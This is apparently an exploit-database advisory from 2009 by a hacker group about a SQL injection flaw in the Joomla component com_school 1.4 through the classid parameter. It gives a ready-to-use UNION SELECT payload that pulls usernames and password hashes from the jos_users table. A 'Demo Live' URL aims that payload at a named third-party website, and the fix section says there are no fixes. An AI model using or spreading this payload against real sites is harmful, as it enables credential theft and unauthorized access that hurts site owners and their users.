Joomla Component com_school 1.4 (classid) SQL Injection Vulnerability

2009-06-08 17:32:09

----------------------------------------------------------------------
Joomla Component com_school (classid) SQL injection Vulnerability
----------------------------------------------------------------------

###################################################
[+] Author : Chip D3 Bi0s
[+] Email : chipdebios[alt+64]gmail.com
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
###################################################

________________________________________________________

Example:

http://localHost/path/index.php?option=com_school&Itemid=null&func=showclass&classid=<sql Code>

<Sql Code>:
-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*


Demo Live:
http://www.mariadecervello.com/index.php?option=com_school&Itemid=null&func=showclass&classid=-null'+union+select+concat(username,0x3a,password)ChipD3Bi0s,null+from+jos_users/*


+++++++++++++++++++++++++++++++++
[!] Produced in South America
------------------------------------


<name>school</name>
<creationDate>18 July 2006</creationDate>
<author>Soner (pisdoktor) Ekici - Alex Chaparro</author>
<copyright>
This component in released under the GNU/GPL License
</copyright>
<authorEmail>[email protected]</authorEmail>
<authorUrl>www.joomla.cl</authorUrl>
<version>1.4</version>

#

Fixes

No fixes

In order to submit a new fix you need to be registered.